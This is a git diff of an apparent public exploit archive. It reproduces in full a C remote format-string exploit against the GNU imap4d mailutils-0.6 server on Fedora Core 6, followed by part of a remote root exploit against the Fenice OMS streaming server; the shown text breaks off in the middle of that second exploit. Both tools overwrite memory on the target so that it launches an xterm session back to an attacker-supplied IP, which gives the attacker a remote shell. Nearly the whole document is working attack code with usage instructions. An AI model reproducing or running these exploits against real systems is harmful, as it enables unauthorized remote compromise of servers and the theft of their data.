-** -** xterm exploit code includes do_system() address can be writen in 136 bytes -** of general exploit code. -** -*/ - -#include -#include -#include -#include -#include -#include - -#define DEF_STR "x0x" -#define PORT 143 - -#define DF_SFLAG 11 -#define DF_OFFSET 29 -#define DTOR_END_ADDR 0x08059268 -#define DO_SYSTEM 0x828282 -#define SHELL 0x3b6873 -#define DEF_DO_SYSTEM_OFFSET 0x1fbf9 -#define GET_DO_SYSTEM_SFLAG 38 - -#define XHOST_IP "82.82.82.82" - -void banrl(); -void usage(); -void re_connt(int sock); -int setsock(char *host,int port); - - -long xterm_shell[]={ // do_system("xterm -di ip_addr"); - 0x7478,0x7265, - 0x206d,0x642d, - 0x2069,0x4141, /* IP address */ - 0x4141,0x4141, - 0x4141,0x4141, - 0x303a,0x0000 -}; -int xterm_ip_count=5; - - -int get_10_ip(char *ipbuf){ - char tbuf[32]; - int i=0; - unsigned long ip,ip1,ip2,ip3,ip4; - ip=ip1=ip2=ip3=ip4; - - sscanf(ipbuf,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); -#define IP1 16777216 -#define IP2 65536 -#define IP3 256 - ip=0; - ip+=ip1 * (IP1); - ip+=ip2 * (IP2); - ip+=ip3 * (IP3); - ip+=ip4; - - memset((char *)ipbuf,0,256); - sprintf(ipbuf,"%lu",ip); - xterm_ip_count=5; - - for(i=0;i<10;i+=2){ - memset((char *)tbuf,0,sizeof(tbuf)); - snprintf(tbuf,sizeof(tbuf)-1,"0x%02x%02x",ipbuf[i+1],ipbuf[i]); - - ip=strtoul(tbuf,NULL,0); - xterm_shell[xterm_ip_count++]=ip; - } - return 0; -} - -int send_exploit_code(int sock,unsigned long retloc,unsigned long retaddr,int sflag){ - char buf[1024]; - int i=0; - - memset((char *)buf,0,sizeof(buf)); - snprintf(buf,sizeof(buf)-1,"1 search topic x"); - i=strlen(buf); - *(long *)&buf[i]=retloc; - i+=4; - if(retaddr==0){ - retaddr+=0x10000; - } - sprintf(buf+i,"%%%lux%%%d$n\n",retaddr-i-DF_OFFSET,sflag); - - send(sock,buf,strlen(buf),0); - memset(buf,0,sizeof(buf)); - while(recv(sock,buf,sizeof(buf)-1,0)){ - if(strstr(buf,")")){ - break; - } - } - return 0; -} - -int main(int argc,char *argv[]){ - int sflag=DF_SFLAG; - unsigned long do_system_addr=DO_SYSTEM; - unsigned long 
retloc=DTOR_END_ADDR; - unsigned long shaddr=SHELL; - char host[256]=DEF_STR; - int port=PORT; - extern char *optarg; - int sock,i,r=0; - char buf[1024]; - char user[256]=DEF_STR; - char pass[256]=DEF_STR; - char *ptr=NULL; - char xhost_ip_buf[256]=XHOST_IP; - - get_10_ip(xhost_ip_buf); - - memset((char *)buf,0,sizeof(buf)); - memset((char *)user,0,sizeof(user)); - memset((char *)pass,0,sizeof(pass)); - - (void)banrl(); - while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){ - switch(sock){ - case 'R': - case 'r': - retloc=strtoul(optarg,NULL,0); - break; - case 'D': - case 'd': - do_system_addr=strtoul(optarg,NULL,0); - break; - case 'H': - case 'h': - memset((char *)host,0,sizeof(host)); - strncpy(host,optarg,sizeof(host)-1); - break; - case 'P': - case 'p': - port=atoi(optarg); - break; - case 'F': - case 'f': - sflag=atoi(optarg); - break; - case 'I': - case 'i': - memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); - strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); - get_10_ip(xhost_ip_buf); - break; - case 'U': - case 'u': - memset((char *)user,0,sizeof(user)); - strncpy(user,optarg,sizeof(user)-1); - break; - case 'S': - case 's': - memset((char *)pass,0,sizeof(pass)); - strncpy(pass,optarg,sizeof(pass)-1); - break; - case '?': - default: - (void)usage(argv[0]); - break; - } - } - if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){ - (void)usage(argv[0]); - } - - fprintf(stdout," [+] make socket.\n"); - fprintf(stdout," [+] host: %s.\n",host); - fprintf(stdout," [+] port: %d.\n",port); - sock=setsock(host,port); - re_connt(sock); - - recv(sock,buf,sizeof(buf)-1,0); - if(strstr(buf,"IMAP4rev1")){ - fprintf(stdout," [+] OK, IMAP4rev1.\n"); - } - else { - fprintf(stdout," [-] Ooops, no match.\n\n"); - close(sock); - exit(-1); - } - - memset((char *)buf,0,sizeof(buf)); - snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass); - send(sock,buf,strlen(buf),0); - memset((char *)buf,0,sizeof(buf)); - 
while(recv(sock,buf,sizeof(buf)-1,0)){ - if(strstr(buf," Completed")){ - fprintf(stdout," [+] login completed.\n"); - break; - } - else if(strstr(buf," rejected")){ - fprintf(stdout," [-] login failed.\n\n"); - exit(-1); - } - } - - memset((char *)buf,0,sizeof(buf)); - snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n"); - send(sock,buf,strlen(buf),0); - memset((char *)buf,0,sizeof(buf)); - while(recv(sock,buf,sizeof(buf)-1,0)){ - if(strstr(buf," Completed")){ - fprintf(stdout," [+] select success.\n"); - break; - } - else if(strstr(buf," NO SELECT")){ - fprintf(stdout," [-] select failed.\n\n"); - exit(-1); - } - } - - - /* get, do_system address */ - fprintf(stdout," [+] find do_system address.\n"); - memset((char *)buf,0,sizeof(buf)); - snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG); - send(sock,buf,strlen(buf),0); - memset((char *)buf,0,sizeof(buf)); - recv(sock,buf,sizeof(buf)-1,0); - if(strstr(buf,"|")){ - ptr=(char *)strstr(buf,"|"); - sscanf(ptr,"|%x|\n",&do_system_addr); - } - do_system_addr-=DEF_DO_SYSTEM_OFFSET; - - fprintf(stdout," [+] make exploit code.\n"); - fprintf(stdout," [+] retloc address: %p.\n",retloc); - fprintf(stdout," [+] do_system address: %p.\n",do_system_addr); - fprintf(stdout," [+] send exploit code.\n"); - - send_exploit_code(sock,retloc,do_system_addr,sflag); - for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){ - send_exploit_code(sock,retloc+r,xterm_shell[i],sflag); - } - - -#define LOGOUT_CMD "1 logout\n" - send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0); - sleep(1); - - recv(sock,buf,sizeof(buf)-1,0); - close(sock); - - if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){ - fprintf(stdout," [+] logout success.\n\n"); - } - else { - fprintf(stdout," [-] logout failed.\n\n"); - exit(-1); - } - exit(0); -} - -void banrl(){ - fprintf(stdout,"\n FC6 (exec-shield) based GNU imap4d mailutils-0.6 search remote exploit\n"); - fprintf(stdout," by Xpl017Elz\n\n"); -} - -void usage(char *arg0){ - fprintf(stdout," Usage: %s 
-options arguments\n\n",arg0); - - fprintf(stdout,"\t-r [retloc] - .dtors address (default: %p).\n",DTOR_END_ADDR); - fprintf(stdout,"\t-d [do_system] - do_system address (auto).\n"); - fprintf(stdout,"\t-h [host] - target hostname or ip.\n"); - fprintf(stdout,"\t-p [port] - target port number (auto).\n"); - fprintf(stdout,"\t-f [sflag] - $-flag number (default: 11).\n"); - fprintf(stdout,"\t-i [ip] - attacker xhost ip.\n"); - fprintf(stdout,"\t-u [user] - imap user id.\n"); - fprintf(stdout,"\t-s [pass] - imap user pass.\n"); - fprintf(stdout,"\t-? - help information.\n\n"); - - fprintf(stdout," Example: %s -hhost -iattacker -ux82 -spass\n\n",arg0); - exit(-1); -} - - -void re_connt(int sock){ - if(sock==-1) - { - fprintf(stdout," [-] Failed.\n\n"); - exit(-1); - } -} - -int setsock(char *host,int port) -{ - int sock; - struct hostent *he; - struct sockaddr_in x82_addr; - - if((he=gethostbyname(host))==NULL) - { - return(-1); - } - - if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) - { - return(-1); - } - - x82_addr.sin_family=AF_INET; - x82_addr.sin_port=htons(port); - x82_addr.sin_addr=*((struct in_addr *)he->h_addr); - bzero(&(x82_addr.sin_zero),8); - - if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) - { - return(-1); - } - return(sock); -} - -/* eoc */ - -// milw0rm.com [2007-04-24] +/* +** +** Fedora Core 6 (exec-shield) based +** GNU imap4d mailutils-0.6 search remote format string exploit +** by Xpl017Elz +** +** Advanced exploitation in exec-shield (Fedora Core case study) +** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt +** +** Reference: http://www.securityfocus.com/bid/14794 (2005/09/09) +** http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=303 +** +** -- +** exploit by "you dong-hun"(Xpl017Elz), . +** My World: http://x82.inetcop.org +** +*/ +/* +** -=-= POINT! POINT! POINT! POINT! POINT! =-=- +** +** This vulnerability is one of the normal exploitation case under exec-shield. 
+** GNU imap4d can be run as a standalone deamon by using -d option and it inherits +** virtual address of parent process which mapped randomly. +** +** [root@localhost .libs]# ps -ef | grep imap4d | grep -v grep +** root 8312 1 0 20:01 ? 00:00:00 ./lt-imap4d -d +** [root@localhost .libs]# +** +** These are keys to get over some possible problems. +** +** * `One shot' exploit without brute-forcing. +** +** Sometimes you man need to do some brute-forcing to assume the library address +** which is mapped randomly. But this is not my recommendation. +** +** Because it is a format string attack, we can possibly get the ramdom address +** of the library. Using this technique, I could find exploitable do_system() +** address at once. but, unfortunately, it is not applicable to blind format string +** exploit by syslog(). +** +** * How to execute a remote shell. +** +** I decided to use xterm for this, but if sadly, there is no xterm on the target +** server then you should look for another way. because of the variableness +** of size of IP address, I felt a need for fitting the address within 10 bytes. +** +** Hacker's IP address would be a perfect demical numbers and it makes size +** of IP address same and shortens the string to overwrite. +** +** xterm exploit code includes do_system() address can be writen in 136 bytes +** of general exploit code. 
+** +*/ + +#include +#include +#include +#include +#include +#include + +#define DEF_STR "x0x" +#define PORT 143 + +#define DF_SFLAG 11 +#define DF_OFFSET 29 +#define DTOR_END_ADDR 0x08059268 +#define DO_SYSTEM 0x828282 +#define SHELL 0x3b6873 +#define DEF_DO_SYSTEM_OFFSET 0x1fbf9 +#define GET_DO_SYSTEM_SFLAG 38 + +#define XHOST_IP "82.82.82.82" + +void banrl(); +void usage(); +void re_connt(int sock); +int setsock(char *host,int port); + + +long xterm_shell[]={ // do_system("xterm -di ip_addr"); + 0x7478,0x7265, + 0x206d,0x642d, + 0x2069,0x4141, /* IP address */ + 0x4141,0x4141, + 0x4141,0x4141, + 0x303a,0x0000 +}; +int xterm_ip_count=5; + + +int get_10_ip(char *ipbuf){ + char tbuf[32]; + int i=0; + unsigned long ip,ip1,ip2,ip3,ip4; + ip=ip1=ip2=ip3=ip4; + + sscanf(ipbuf,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); +#define IP1 16777216 +#define IP2 65536 +#define IP3 256 + ip=0; + ip+=ip1 * (IP1); + ip+=ip2 * (IP2); + ip+=ip3 * (IP3); + ip+=ip4; + + memset((char *)ipbuf,0,256); + sprintf(ipbuf,"%lu",ip); + xterm_ip_count=5; + + for(i=0;i<10;i+=2){ + memset((char *)tbuf,0,sizeof(tbuf)); + snprintf(tbuf,sizeof(tbuf)-1,"0x%02x%02x",ipbuf[i+1],ipbuf[i]); + + ip=strtoul(tbuf,NULL,0); + xterm_shell[xterm_ip_count++]=ip; + } + return 0; +} + +int send_exploit_code(int sock,unsigned long retloc,unsigned long retaddr,int sflag){ + char buf[1024]; + int i=0; + + memset((char *)buf,0,sizeof(buf)); + snprintf(buf,sizeof(buf)-1,"1 search topic x"); + i=strlen(buf); + *(long *)&buf[i]=retloc; + i+=4; + if(retaddr==0){ + retaddr+=0x10000; + } + sprintf(buf+i,"%%%lux%%%d$n\n",retaddr-i-DF_OFFSET,sflag); + + send(sock,buf,strlen(buf),0); + memset(buf,0,sizeof(buf)); + while(recv(sock,buf,sizeof(buf)-1,0)){ + if(strstr(buf,")")){ + break; + } + } + return 0; +} + +int main(int argc,char *argv[]){ + int sflag=DF_SFLAG; + unsigned long do_system_addr=DO_SYSTEM; + unsigned long retloc=DTOR_END_ADDR; + unsigned long shaddr=SHELL; + char host[256]=DEF_STR; + int port=PORT; + extern char 
*optarg; + int sock,i,r=0; + char buf[1024]; + char user[256]=DEF_STR; + char pass[256]=DEF_STR; + char *ptr=NULL; + char xhost_ip_buf[256]=XHOST_IP; + + get_10_ip(xhost_ip_buf); + + memset((char *)buf,0,sizeof(buf)); + memset((char *)user,0,sizeof(user)); + memset((char *)pass,0,sizeof(pass)); + + (void)banrl(); + while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){ + switch(sock){ + case 'R': + case 'r': + retloc=strtoul(optarg,NULL,0); + break; + case 'D': + case 'd': + do_system_addr=strtoul(optarg,NULL,0); + break; + case 'H': + case 'h': + memset((char *)host,0,sizeof(host)); + strncpy(host,optarg,sizeof(host)-1); + break; + case 'P': + case 'p': + port=atoi(optarg); + break; + case 'F': + case 'f': + sflag=atoi(optarg); + break; + case 'I': + case 'i': + memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); + strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); + get_10_ip(xhost_ip_buf); + break; + case 'U': + case 'u': + memset((char *)user,0,sizeof(user)); + strncpy(user,optarg,sizeof(user)-1); + break; + case 'S': + case 's': + memset((char *)pass,0,sizeof(pass)); + strncpy(pass,optarg,sizeof(pass)-1); + break; + case '?': + default: + (void)usage(argv[0]); + break; + } + } + if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){ + (void)usage(argv[0]); + } + + fprintf(stdout," [+] make socket.\n"); + fprintf(stdout," [+] host: %s.\n",host); + fprintf(stdout," [+] port: %d.\n",port); + sock=setsock(host,port); + re_connt(sock); + + recv(sock,buf,sizeof(buf)-1,0); + if(strstr(buf,"IMAP4rev1")){ + fprintf(stdout," [+] OK, IMAP4rev1.\n"); + } + else { + fprintf(stdout," [-] Ooops, no match.\n\n"); + close(sock); + exit(-1); + } + + memset((char *)buf,0,sizeof(buf)); + snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass); + send(sock,buf,strlen(buf),0); + memset((char *)buf,0,sizeof(buf)); + while(recv(sock,buf,sizeof(buf)-1,0)){ + if(strstr(buf," Completed")){ + fprintf(stdout," [+] login completed.\n"); + 
break; + } + else if(strstr(buf," rejected")){ + fprintf(stdout," [-] login failed.\n\n"); + exit(-1); + } + } + + memset((char *)buf,0,sizeof(buf)); + snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n"); + send(sock,buf,strlen(buf),0); + memset((char *)buf,0,sizeof(buf)); + while(recv(sock,buf,sizeof(buf)-1,0)){ + if(strstr(buf," Completed")){ + fprintf(stdout," [+] select success.\n"); + break; + } + else if(strstr(buf," NO SELECT")){ + fprintf(stdout," [-] select failed.\n\n"); + exit(-1); + } + } + + + /* get, do_system address */ + fprintf(stdout," [+] find do_system address.\n"); + memset((char *)buf,0,sizeof(buf)); + snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG); + send(sock,buf,strlen(buf),0); + memset((char *)buf,0,sizeof(buf)); + recv(sock,buf,sizeof(buf)-1,0); + if(strstr(buf,"|")){ + ptr=(char *)strstr(buf,"|"); + sscanf(ptr,"|%x|\n",&do_system_addr); + } + do_system_addr-=DEF_DO_SYSTEM_OFFSET; + + fprintf(stdout," [+] make exploit code.\n"); + fprintf(stdout," [+] retloc address: %p.\n",retloc); + fprintf(stdout," [+] do_system address: %p.\n",do_system_addr); + fprintf(stdout," [+] send exploit code.\n"); + + send_exploit_code(sock,retloc,do_system_addr,sflag); + for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){ + send_exploit_code(sock,retloc+r,xterm_shell[i],sflag); + } + + +#define LOGOUT_CMD "1 logout\n" + send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0); + sleep(1); + + recv(sock,buf,sizeof(buf)-1,0); + close(sock); + + if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){ + fprintf(stdout," [+] logout success.\n\n"); + } + else { + fprintf(stdout," [-] logout failed.\n\n"); + exit(-1); + } + exit(0); +} + +void banrl(){ + fprintf(stdout,"\n FC6 (exec-shield) based GNU imap4d mailutils-0.6 search remote exploit\n"); + fprintf(stdout," by Xpl017Elz\n\n"); +} + +void usage(char *arg0){ + fprintf(stdout," Usage: %s -options arguments\n\n",arg0); + + fprintf(stdout,"\t-r [retloc] - .dtors address (default: %p).\n",DTOR_END_ADDR); + 
fprintf(stdout,"\t-d [do_system] - do_system address (auto).\n"); + fprintf(stdout,"\t-h [host] - target hostname or ip.\n"); + fprintf(stdout,"\t-p [port] - target port number (auto).\n"); + fprintf(stdout,"\t-f [sflag] - $-flag number (default: 11).\n"); + fprintf(stdout,"\t-i [ip] - attacker xhost ip.\n"); + fprintf(stdout,"\t-u [user] - imap user id.\n"); + fprintf(stdout,"\t-s [pass] - imap user pass.\n"); + fprintf(stdout,"\t-? - help information.\n\n"); + + fprintf(stdout," Example: %s -hhost -iattacker -ux82 -spass\n\n",arg0); + exit(-1); +} + + +void re_connt(int sock){ + if(sock==-1) + { + fprintf(stdout," [-] Failed.\n\n"); + exit(-1); + } +} + +int setsock(char *host,int port) +{ + int sock; + struct hostent *he; + struct sockaddr_in x82_addr; + + if((he=gethostbyname(host))==NULL) + { + return(-1); + } + + if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) + { + return(-1); + } + + x82_addr.sin_family=AF_INET; + x82_addr.sin_port=htons(port); + x82_addr.sin_addr=*((struct in_addr *)he->h_addr); + bzero(&(x82_addr.sin_zero),8); + + if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) + { + return(-1); + } + return(sock); +} + +/* eoc */ + +// milw0rm.com [2007-04-24] diff --git a/platforms/linux/remote/379.txt b/platforms/linux/remote/379.txt index c8fda87c1..b04474ad1 100755 --- a/platforms/linux/remote/379.txt +++ b/platforms/linux/remote/379.txt @@ -1,3 +1,3 @@ -filediff?f=CVSROOT/rcsinfo&v1=1.1&v2=1.2;last; - -# milw0rm.com [2004-08-06] +filediff?f=CVSROOT/rcsinfo&v1=1.1&v2=1.2;last; + +# milw0rm.com [2004-08-06] diff --git a/platforms/linux/remote/380.c b/platforms/linux/remote/380.c index dc5a37149..3d30b334c 100755 --- a/platforms/linux/remote/380.c +++ b/platforms/linux/remote/380.c @@ -313,6 +313,6 @@ int main(int argc, char **argv) return EXIT_SUCCESS; } - - -// milw0rm.com [2004-08-08] + + +// milw0rm.com [2004-08-08] diff --git a/platforms/linux/remote/3815.c b/platforms/linux/remote/3815.c index dab6d7d45..e48a39582 100755 
--- a/platforms/linux/remote/3815.c +++ b/platforms/linux/remote/3815.c 
@@ -1,370 +1,370 @@ -/* -** -** Fedora Core 6 (exec-shield) based -** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit -** by Xpl017Elz -** -** Advanced exploitation in exec-shield (Fedora Core case study) -** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt -** -** Reference: http://www.securityfocus.com/bid/17678 -** vendor: http://streaming.polito.it/legacy_server -** -** -- -** exploit by "you dong-hun"(Xpl017Elz), . -** My World: http://x82.inetcop.org -** -*/ -/* -** -=-= POINT! POINT! POINT! POINT! POINT! =-=- -** -** This is a very common standalone daemon remote buffer overflow vulnerability. -** I used the method that I used on my proftpd exploit again to avoid random mapping library. -** And I'm plainning to publish it in English. -** -** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt -** -** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more. -** -*/ - -#include -#include -#include -#include -#include -#include - - -#define UNAME_PLT 0x8048e9c // // randomÇϰÔ mappingµÇ´Â (execle()>>16)&0xff GOT 1byte¸¦ È®º¸Çϱâ À§ÇØ - -#define STRCPY_PLT 0x08048ffc // -#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>: pop %ebx // retÀ» Æ÷ÇÔ ÃÑ 12byte À̵¿ (nergal's idea) - -#define GETGID_GOT 0x8059234 // execle() ÇÔ¼ö ÁÖ¼Ò¸¦ ÀÓÀÇ·Î Á¶ÇÕÇÏ¿© ³ÖÀ» GOT ÁÖ¼Ò -/* - (gdb) x/x 0x8059234 - 0x8059234 <_GLOBAL_OFFSET_TABLE_+324>: 0x08049222 - (gdb) x 0x08049222 - 0x8049222 : 0x00027068 - (gdb) -*/ -#define GETGID_PLT 0x0804921c // // GOT Á¶ÇÕ ÀÌÈÄ, PLT¸¦ ÅëÇØ execle() ÇÔ¼ö Çڵ鸵 - - -#define EXECLE_16_0xff 0x8059156 // (execle()>>16)&0xff // uname ÇÔ¼öÀÇ 1byte: 0x!!0000 -#define EXECLE_08_0xff 0x80591b5 // (execle()>>8)&0xff // bind ÇÔ¼öÀÇ 1byte: 0x00!!00 -#define EXECLE_00_0xff 0x8048e83 // (execle()>>0)&0xff // ³ª¸ÓÁö Á¤ÀûÀÎ 1byte: 0x0000!! 
- - -/* Á¤ÀûÀ¸·Î Á¢±Ù °¡´ÉÇÑ ¹öÆÛ°¡ ÀÖÀ» °æ¿ì, ÇÊ¿ä ¾øÀ½ */ -#define DATA_LOC 0x805af4c // heap ºó °ø°£À» ÀÌ¿ë - - -/* /usr/X11R6/bin/xterm */ -#define ARG1_LOC 0x805af4c // Á¶ÇÕµÈ ¸í·É ½ÃÀÛ ÁÖ¼Ò (argv[0],argv[1]·Î ¾²ÀÓ) -#define SLASH_STR 0x8055acb // "/" -#define XTERM_STR_1 0x804875d // "us" -#define XTERM_STR_2 0x80585ce // "r/" -#define X_STR_1 0x8048df3 // "X" -#define R_STR 0x804a572 // "R" -#define XTERM_STR_3 0x804882c // "bin" -#define X_STR_2 0x8048e33 // "x" -#define XTERM_STR_4 0x8056a33 // "term" - - -/* -display */ -#define ARG2_LOC 0x805af61 // Á¶ÇÕµÈ ¿É¼Ç ½ÃÀÛ ÁÖ¼Ò (argv[2]·Î ¾²ÀÓ) -#define DISPLAY_OPTION 0x80584b8 // "-di" - - -/* xhost_ip:0 */ -#define ARG3_LOC 0x805af65 // Á¶ÇÕµÈ xhost IP ½ÃÀÛ ÁÖ¼Ò (argv[3]À¸·Î ¾²ÀÓ) -#define NUM_0 0x8053285 // "0" -#define NUM_1 0x804ef17 // "1" -#define NUM_2 0x804b37b // "2" -#define NUM_3 0x804d622 // "3" -#define NUM_4 0x804e583 // "4" -#define NUM_5 0x80554d7 // "5" -#define NUM_6 0x8052341 // "6" -#define NUM_7 0x804d14a // "7" -#define NUM_8 0x8048db3 // "8" -#define NUM_9 0x80516bb // "9" - - -#define COLON_STR 0x8057abb // ":" -#define NULL_STR 0x805afbe // 0x00000000 - - -int main(int argc,char *argv[]){ - int i=0,j=0; - struct hostent *se; - struct sockaddr_in saddr; - unsigned long ip,ip1,ip2,ip3,ip4; - unsigned char do_ex[4096]; - unsigned char xhost_ip[256]; - int sock; - char host[256]; - int port=554; - - memset((char *)do_ex,0,sizeof(do_ex)); - ip=ip1=ip2=ip3=ip4; - - - printf("/*\n**\n** Fedora Core 6 (exec-shield) based\n" - "** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\n" - "** by Xpl017Elz\n**\n"); - if(argc<2){ - printf("** Usage: %s [host] [port] [xhost ip]\n",argv[0]); - printf("**\n** host: Fenice 1.10 Open Media Streaming Server\n"); - printf("** port: default 554\n"); - printf("** xhost ip: attacker xhost\n**\n"); - printf("** Example: %s fenice.omss.co.kr 554 82.82.82.82\n**\n*/\n",argv[0]); - exit(-1); - } - else { - 
sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); -#define IP1 16777216 -#define IP2 65536 -#define IP3 256 - ip=0; - ip+=ip1 * (IP1); - ip+=ip2 * (IP2); - ip+=ip3 * (IP3); - ip+=ip4; - - memset((char *)xhost_ip,0,256); - sprintf(xhost_ip,"%10lu",ip); - } - - memset((char *)host,0,sizeof(host)); - strncpy(host,argv[1],sizeof(host)-1); - port=atoi(argv[2]); - - se=gethostbyname(host); - if(se==NULL){ - printf("** gethostbyname() error\n**\n*/\n"); - return -1; - } - sock=socket(AF_INET,SOCK_STREAM,0); - if(sock==-1){ - printf("** socket() error\n**\n*/\n"); - return -1; - } - - saddr.sin_family=AF_INET; - saddr.sin_port=htons(port); - saddr.sin_addr=*((struct in_addr *)se->h_addr); - bzero(&(saddr.sin_zero),8); - - - printf("** make exploit\n"); - sprintf(do_ex,"GET /"); - j=strlen(do_ex); - for(i=0;i<320;i++,j++){ - sprintf(do_ex+j,"A"); - } - -#define __GOGOSSING(dest,index,src){\ - *(long *)&dest[index]=src;\ - index+=4;\ -} - - __GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT °ª ä¿ò */ - // execle() ÁÖ¼Ò Á¶ÇÕ - { - i=0; - /* (execle()>>0)&0xff */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,GETGID_GOT+i++); - __GOGOSSING(do_ex,j,EXECLE_00_0xff); - /* (execle()>>8)&0xff */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,GETGID_GOT+i++); - __GOGOSSING(do_ex,j,EXECLE_08_0xff); - /* (execle()>>16)&0xff */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,GETGID_GOT+i++); - __GOGOSSING(do_ex,j,EXECLE_16_0xff); - } - // argv[0],argv[1]: /usr/X11R6/bin/xterm - { - i=0; - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,SLASH_STR); - i+=1; /* "/" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,XTERM_STR_1); - i+=2; /* "us" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - 
__GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,XTERM_STR_2); - i+=2; /* "r/" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,X_STR_1); - i+=1; /* "X" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NUM_1); - i+=1; /* "1" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NUM_1); - i+=1; /* "1" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,R_STR); - i+=1; /* "R" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NUM_6); - i+=1; /* "6" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,SLASH_STR); - i+=1; /* "/" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,XTERM_STR_3); - i+=3; /* "bin" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,SLASH_STR); - i+=1; /* "/" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,X_STR_2); - i+=1; /* "x" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,XTERM_STR_4); - i+=4; /* "term" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NULL_STR); - i+=1; /* null */ - } - // argv[2]: -display - { - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,DISPLAY_OPTION); - i+=3; /* "-di" */ - 
